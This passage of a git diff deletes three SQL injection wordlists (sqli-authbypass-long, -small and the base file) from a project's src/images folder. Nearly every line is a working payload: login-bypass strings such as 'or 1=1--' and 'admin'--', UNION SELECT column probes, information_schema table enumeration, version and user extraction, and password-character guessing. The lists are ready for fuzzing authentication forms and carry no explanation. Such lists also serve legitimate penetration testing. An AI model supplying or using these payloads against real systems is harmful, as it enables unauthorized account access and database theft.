-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-long.txt b/src/images/sqli-authbypass-long.txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-long.txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-small.txt b/src/images/sqli-authbypass-small.txt
deleted file mode 100644
index 331068b47..000000000
--- a/src/images/sqli-authbypass-small.txt
+++ /dev/null
@@ -1,197 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-ffifdyop
\ No newline at end of file
diff --git a/src/images/sqli-authbypass.txt b/src/images/sqli-authbypass.txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass.txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
